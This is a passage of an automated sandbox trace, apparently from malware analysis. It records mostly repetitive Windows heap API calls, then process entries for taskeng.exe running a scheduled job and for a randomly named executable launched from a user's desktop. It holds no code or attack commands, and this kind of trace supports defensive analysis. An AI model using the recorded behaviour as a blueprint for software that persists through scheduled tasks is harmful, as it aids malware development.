HALPmcxz\\AppData\\Local\\Temp\\tmpF0A4.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0069.079] GetProcessHeap () returned 0x530000 [0069.079] GetProcessHeap () returned 0x530000 [0069.079] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x546a38) returned 1 [0069.079] GetProcessHeap () returned 0x530000 [0069.079] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x546a38) returned 0x1fc [0069.079] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x546a38 | out: hHeap=0x530000) returned 1 [0069.079] GetProcessHeap () returned 0x530000 [0069.079] GetProcessHeap () returned 0x530000 [0069.079] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x5469b0) returned 1 [0069.079] GetProcessHeap () returned 0x530000 [0069.079] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5469b0) returned 0x7a [0069.080] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5469b0 | out: hHeap=0x530000) returned 1 [0069.080] GetProcessHeap () returned 0x530000 [0069.080] GetProcessHeap () returned 0x530000 [0069.080] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x545328) returned 1 [0069.080] GetProcessHeap () returned 0x530000 [0069.080] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x545328) returned 0x16 [0069.080] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545328 | out: hHeap=0x530000) returned 1 [0069.080] GetProcessHeap () returned 0x530000 [0069.080] GetProcessHeap () returned 0x530000 [0069.080] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x544b58) returned 1 [0069.080] GetProcessHeap () returned 0x530000 [0069.080] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544b58) returned 0x10 [0069.080] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544b58 | out: hHeap=0x530000) returned 1 [0069.080] GetProcessHeap () returned 0x530000 [0069.080] GetProcessHeap () returned 0x530000 [0069.080] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x545348) returned 1 [0069.080] GetProcessHeap () returned 0x530000 [0069.080] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x545348) returned 0x14 [0069.080] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545348 | out: hHeap=0x530000) returned 1 [0069.080] GetProcessHeap () returned 0x530000 [0069.080] GetProcessHeap () returned 0x530000 [0069.080] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x546600) returned 1 [0069.080] GetProcessHeap () returned 0x530000 [0069.080] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x546600) returned 0xa0 [0069.080] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x546600 | out: hHeap=0x530000) returned 1 [0069.080] GetProcessHeap () returned 0x530000 [0069.080] GetProcessHeap () returned 0x530000 [0069.080] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x544c30) returned 1 [0069.080] GetProcessHeap () returned 0x530000 [0069.081] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544c30) returned 0x10 [0069.081] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544c30 | out: hHeap=0x530000) returned 1 [0069.081] GetProcessHeap () returned 0x530000 [0069.081] GetProcessHeap () returned 0x530000 [0069.081] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x545228) returned 1 [0069.081] GetProcessHeap () returned 0x530000 [0069.081] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x545228) returned 0x14 [0069.081] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545228 | out: hHeap=0x530000) returned 1 [0069.081] GetProcessHeap () returned 0x530000 [0069.081] GetProcessHeap () returned 0x530000 [0069.081] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x546928) returned 1 [0069.081] GetProcessHeap () returned 0x530000 [0069.081] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x546928) returned 0x7e [0069.081] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x546928 | out: hHeap=0x530000) returned 1 [0069.081] GetProcessHeap () returned 0x530000 [0069.081] GetProcessHeap () returned 0x530000 [0069.081] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x544cd8) returned 1 [0069.081] GetProcessHeap () returned 0x530000 [0069.081] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544cd8) returned 0x10 [0069.081] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544cd8 | out: hHeap=0x530000) returned 1 [0069.081] GetProcessHeap () returned 0x530000 [0069.081] GetProcessHeap () returned 0x530000 [0069.081] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x5451e8) returned 1 [0069.081] GetProcessHeap () returned 0x530000 [0069.081] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5451e8) returned 0x14 [0069.081] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5451e8 | out: hHeap=0x530000) returned 1 [0069.081] GetProcessHeap () returned 0x530000 [0069.081] GetProcessHeap () returned 0x530000 [0069.081] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x544cc0) returned 1 [0069.081] GetProcessHeap () returned 0x530000 [0069.082] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544cc0) returned 0xc [0069.082] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544cc0 | out: hHeap=0x530000) returned 1 [0069.082] GetProcessHeap () returned 0x530000 [0069.082] GetProcessHeap () returned 0x530000 [0069.082] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x544ca8) returned 1 [0069.082] GetProcessHeap () returned 0x530000 [0069.082] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544ca8) returned 0x10 [0069.082] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544ca8 | out: hHeap=0x530000) returned 1 [0069.082] GetProcessHeap () returned 0x530000 [0069.082] GetProcessHeap () returned 0x530000 [0069.082] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x5451c8) returned 1 [0069.082] GetProcessHeap () returned 0x530000 [0069.082] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5451c8) returned 0x14 [0069.082] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5451c8 | out: hHeap=0x530000) returned 1 [0069.082] GetProcessHeap () returned 0x530000 [0069.082] GetProcessHeap () returned 0x530000 [0069.082] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x545a10) returned 1 [0069.082] GetProcessHeap () returned 0x530000 [0069.082] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x545a10) returned 0x208 [0069.082] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545a10 | out: hHeap=0x530000) returned 1 [0069.082] GetProcessHeap () returned 0x530000 [0069.082] GetProcessHeap () returned 0x530000 [0069.082] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x544bd0) returned 1 [0069.082] GetProcessHeap () returned 0x530000 [0069.082] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544bd0) returned 0x10 [0069.082] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544bd0 | out: hHeap=0x530000) returned 1 [0069.082] GetProcessHeap () returned 0x530000 [0069.082] GetProcessHeap () returned 0x530000 [0069.082] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x545188) returned 1 [0069.083] GetProcessHeap () returned 0x530000 [0069.083] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x545188) returned 0x14 [0069.083] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545188 | out: hHeap=0x530000) returned 1 [0069.083] GetProcessHeap () returned 0x530000 [0069.083] GetProcessHeap () returned 0x530000 [0069.083] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x5466a8) returned 1 [0069.083] GetProcessHeap () returned 0x530000 [0069.083] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5466a8) returned 0x200 [0069.083] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5466a8 | out: hHeap=0x530000) returned 1 [0069.083] GetProcessHeap () returned 0x530000 [0069.083] GetProcessHeap () returned 0x530000 [0069.083] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x544c48) returned 1 [0069.083] GetProcessHeap () returned 0x530000 [0069.083] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544c48) returned 0x10 [0069.083] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544c48 | out: hHeap=0x530000) returned 1 [0069.083] GetProcessHeap () returned 0x530000 [0069.083] GetProcessHeap () returned 0x530000 [0069.083] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x545128) returned 1 [0069.083] GetProcessHeap () returned 0x530000 [0069.083] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x545128) returned 0x14 [0069.083] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545128 | out: hHeap=0x530000) returned 1 [0069.083] GetProcessHeap () returned 0x530000 [0069.083] GetProcessHeap () returned 0x530000 [0069.083] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x5452a8) returned 1 [0069.083] GetProcessHeap () returned 0x530000 [0069.083] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5452a8) returned 0x14 [0069.083] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5452a8 | out: hHeap=0x530000) returned 1 [0069.083] GetProcessHeap () returned 0x530000 [0069.083] GetProcessHeap () returned 0x530000 [0069.083] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x544c90) returned 1 [0069.084] GetProcessHeap () returned 0x530000 [0069.084] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544c90) returned 0x10 [0069.084] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544c90 | out: hHeap=0x530000) returned 1 [0069.084] GetProcessHeap () returned 0x530000 [0069.084] GetProcessHeap () returned 0x530000 [0069.084] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x5450a8) returned 1 [0069.084] GetProcessHeap () returned 0x530000 [0069.084] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5450a8) returned 0x14 [0069.084] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5450a8 | out: hHeap=0x530000) returned 1 [0069.084] GetProcessHeap () returned 0x530000 [0069.084] GetProcessHeap () returned 0x530000 [0069.084] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x5452e8) returned 1 [0069.084] GetProcessHeap () returned 0x530000 [0069.084] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5452e8) returned 0x16 [0069.084] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5452e8 | out: hHeap=0x530000) returned 1 [0069.084] GetProcessHeap () returned 0x530000 [0069.084] GetProcessHeap () returned 0x530000 [0069.084] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x544c60) returned 1 [0069.084] GetProcessHeap () returned 0x530000 [0069.084] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544c60) returned 0x10 [0069.084] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544c60 | out: hHeap=0x530000) returned 1 [0069.084] GetProcessHeap () returned 0x530000 [0069.084] GetProcessHeap () returned 0x530000 [0069.084] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x545070) returned 1 [0069.084] GetProcessHeap () returned 0x530000 [0069.084] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x545070) returned 0x14 [0069.084] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545070 | out: hHeap=0x530000) returned 1 [0069.084] GetProcessHeap () returned 0x530000 [0069.084] GetProcessHeap () returned 0x530000 [0069.085] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x544f40) returned 1 [0069.085] GetProcessHeap () returned 0x530000 [0069.085] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544f40) returned 0x2 [0069.085] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544f40 | out: hHeap=0x530000) returned 1 [0069.085] GetProcessHeap () returned 0x530000 [0069.085] GetProcessHeap () returned 0x530000 [0069.085] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x544f50) returned 1 [0069.085] GetProcessHeap () returned 0x530000 [0069.085] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544f50) returned 0x14 [0069.085] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544f50 | out: hHeap=0x530000) returned 1 [0069.085] GetProcessHeap () returned 0x530000 [0069.085] GetProcessHeap () returned 0x530000 [0069.085] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x544f70) returned 1 [0069.085] GetProcessHeap () returned 0x530000 [0069.085] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544f70) returned 0x14 [0069.085] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544f70 | out: hHeap=0x530000) returned 1 [0069.085] GetProcessHeap () returned 0x530000 [0069.085] GetProcessHeap () returned 0x530000 [0069.085] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x544f90) returned 1 [0069.085] GetProcessHeap () returned 0x530000 [0069.085] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544f90) returned 0x14 [0069.085] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544f90 | out: hHeap=0x530000) returned 1 [0069.085] GetProcessHeap () returned 0x530000 [0069.085] GetProcessHeap () returned 0x530000 [0069.085] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x544fb0) returned 1 [0069.085] GetProcessHeap () returned 0x530000 [0069.085] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544fb0) returned 0x14 [0069.085] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544fb0 | out: hHeap=0x530000) returned 1 [0069.085] GetProcessHeap () returned 0x530000 [0069.086] GetProcessHeap () returned 0x530000 [0069.086] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x545248) returned 1 [0069.086] GetProcessHeap () returned 0x530000 [0069.086] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x545248) returned 0x14 [0069.086] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545248 | out: hHeap=0x530000) returned 1 [0069.086] GetProcessHeap () returned 0x530000 [0069.086] GetProcessHeap () returned 0x530000 [0069.086] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x545268) returned 1 [0069.086] GetProcessHeap () returned 0x530000 [0069.086] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x545268) returned 0x14 [0069.086] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545268 | out: hHeap=0x530000) returned 1 [0069.086] GetProcessHeap () returned 0x530000 [0069.086] GetProcessHeap () returned 0x530000 [0069.086] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x5468b0) returned 1 [0069.086] GetProcessHeap () returned 0x530000 [0069.086] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5468b0) returned 0x30 [0069.086] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5468b0 | out: hHeap=0x530000) returned 1 [0069.086] GetProcessHeap () returned 0x530000 [0069.086] GetProcessHeap () returned 0x530000 [0069.086] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x545288) returned 1 [0069.086] GetProcessHeap () returned 0x530000 [0069.086] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x545288) returned 0x14 [0069.086] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545288 | out: hHeap=0x530000) returned 1 [0069.086] GetProcessHeap () returned 0x530000 [0069.086] GetProcessHeap () returned 0x530000 [0069.086] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x5468e8) returned 1 [0069.086] GetProcessHeap () returned 0x530000 [0069.086] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5468e8) returned 0x30 [0069.086] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5468e8 | out: hHeap=0x530000) returned 1 [0069.086] GetProcessHeap () returned 0x530000 [0069.087] GetProcessHeap () returned 0x530000 [0069.087] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x545308) returned 1 [0069.087] GetProcessHeap () returned 0x530000 [0069.087] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x545308) returned 0x14 [0069.087] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545308 | out: hHeap=0x530000) returned 1 [0069.087] GetProcessHeap () returned 0x530000 [0069.087] GetProcessHeap () returned 0x530000 [0069.087] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x5547c8) returned 1 [0069.087] GetProcessHeap () returned 0x530000 [0069.087] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5547c8) returned 0x82 [0069.087] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5547c8 | out: hHeap=0x530000) returned 1 [0069.087] GetProcessHeap () returned 0x530000 [0069.087] GetProcessHeap () returned 0x530000 [0069.087] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x5456e8) returned 1 [0069.087] GetProcessHeap () returned 0x530000 [0069.087] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5456e8) returned 0x14 [0069.087] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5456e8 | out: hHeap=0x530000) returned 1 [0069.087] GetProcessHeap () returned 0x530000 [0069.087] GetProcessHeap () returned 0x530000 [0069.087] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x544b88) returned 1 [0069.088] GetProcessHeap () returned 0x530000 [0069.088] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544b88) returned 0x10 [0069.088] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544b88 | out: hHeap=0x530000) returned 1 [0069.088] GetProcessHeap () returned 0x530000 [0069.088] GetProcessHeap () returned 0x530000 [0069.088] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x544fd0) returned 1 [0069.088] GetProcessHeap () returned 0x530000 [0069.088] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544fd0) returned 0x14 [0069.088] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544fd0 | out: hHeap=0x530000) returned 1 [0069.088] GetProcessHeap () returned 0x530000 [0069.089] GetProcessHeap () returned 0x530000 [0069.089] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x544ff0) returned 1 [0069.089] GetProcessHeap () returned 0x530000 [0069.089] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544ff0) returned 0x14 [0069.089] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544ff0 | out: hHeap=0x530000) returned 1 [0069.089] GetProcessHeap () returned 0x530000 [0069.089] GetProcessHeap () returned 0x530000 [0069.089] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x545010) returned 1 [0069.089] GetProcessHeap () returned 0x530000 [0069.089] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x545010) returned 0x14 [0069.089] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545010 | out: hHeap=0x530000) returned 1 [0069.089] GetProcessHeap () returned 0x530000 [0069.089] GetProcessHeap () returned 0x530000 [0069.089] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x545030) returned 1 [0069.089] GetProcessHeap () returned 0x530000 [0069.089] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x545030) returned 0x14 [0069.089] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545030 | out: hHeap=0x530000) returned 1 [0069.089] GetProcessHeap () returned 0x530000 [0069.089] GetProcessHeap () returned 0x530000 [0069.089] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x544ba0) returned 1 [0069.089] GetProcessHeap () returned 0x530000 [0069.089] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544ba0) returned 0x10 [0069.089] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544ba0 | out: hHeap=0x530000) returned 1 [0069.089] GetProcessHeap () returned 0x530000 [0069.089] GetProcessHeap () returned 0x530000 [0069.089] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x545050) returned 1 [0069.089] GetProcessHeap () returned 0x530000 [0069.089] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x545050) returned 0x14 [0069.089] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545050 | out: hHeap=0x530000) returned 1 [0069.090] GetProcessHeap () returned 0x530000 [0069.090] GetProcessHeap () returned 0x530000 [0069.090] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x5450c8) returned 1 [0069.090] GetProcessHeap () returned 0x530000 [0069.090] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5450c8) returned 0x14 [0069.090] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5450c8 | out: hHeap=0x530000) returned 1 [0069.090] GetProcessHeap () returned 0x530000 [0069.090] GetProcessHeap () returned 0x530000 [0069.090] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x545108) returned 1 [0069.090] GetProcessHeap () returned 0x530000 [0069.090] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x545108) returned 0x14 [0069.090] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545108 | out: hHeap=0x530000) returned 1 [0069.090] GetProcessHeap () returned 0x530000 [0069.090] GetProcessHeap () returned 0x530000 [0069.090] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x545148) returned 1 [0069.090] GetProcessHeap () returned 0x530000 [0069.090] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x545148) returned 0x14 [0069.090] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545148 | out: hHeap=0x530000) returned 1 [0069.090] GetProcessHeap () returned 0x530000 [0069.090] GetProcessHeap () returned 0x530000 [0069.090] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x545168) returned 1 [0069.091] GetProcessHeap () returned 0x530000 [0069.091] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x545168) returned 0x14 [0069.091] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545168 | out: hHeap=0x530000) returned 1 [0069.091] GetProcessHeap () returned 0x530000 [0069.091] GetProcessHeap () returned 0x530000 [0069.091] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x545208) returned 1 [0069.091] GetProcessHeap () returned 0x530000 [0069.091] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x545208) returned 0x14 [0069.091] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545208 | out: hHeap=0x530000) returned 1 [0069.091] GetProcessHeap () returned 0x530000 [0069.091] GetProcessHeap () returned 0x530000 [0069.091] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x544bb8) returned 1 [0069.091] GetProcessHeap () returned 0x530000 [0069.091] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544bb8) returned 0x10 [0069.091] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544bb8 | out: hHeap=0x530000) returned 1 [0069.091] GetProcessHeap () returned 0x530000 [0069.091] GetProcessHeap () returned 0x530000 [0069.091] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x5450e8) returned 1 [0069.091] GetProcessHeap () returned 0x530000 [0069.091] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5450e8) returned 0x14 [0069.091] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5450e8 | out: hHeap=0x530000) returned 1 [0069.091] GetProcessHeap () returned 0x530000 [0069.091] GetProcessHeap () returned 0x530000 [0069.091] HeapValidate (hHeap=0x530000, dwFlags=0x0, lpMem=0x544b70) returned 1 [0069.091] GetProcessHeap () returned 0x530000 [0069.091] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544b70) returned 0x10 [0069.092] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544b70 | out: hHeap=0x530000) returned 1 [0069.092] exit (_Code=0) Thread: id = 13 os_tid = 0x834 Process: id = "3" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x76a3f000" os_pid = "0x588" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "2" os_parent_pid = "0x370" cmd_line = "taskeng.exe {4568F795-B030-4E70-B052-419BC1469E0B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 15 os_tid = 0xba8 Thread: id = 16 os_tid = 0x5b4 Thread: id = 17 os_tid = 0x5b0 Thread: id = 18 os_tid = 0x59c Thread: id = 19 os_tid = 0x594 Thread: id = 20 os_tid = 0x58c Process: id = "4" image_name = "v5vybig3hwd7d5jw.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v5vybig3hwd7d5jw.exe" page_root = "0x2550f000" os_pid = "0x854" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xad0" cmd_line = "\"{path}\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 21 os_tid = 0x864 Process: id = "5" image_name = "v5vybig3hwd7d5jw.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v5vybig3hwd7d5jw.exe" page_root = "0x2403e000" os_pid = "0x874" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xad0" cmd_line = "\"{path}\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 22 os_tid = 0x884 [0070.338] GetCommandLineA () returned="\"{path}\"" [0070.338] GetStartupInfoA (in: lpStartupInfo=0x31fa3c | out: lpStartupInfo=0x31fa3c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, 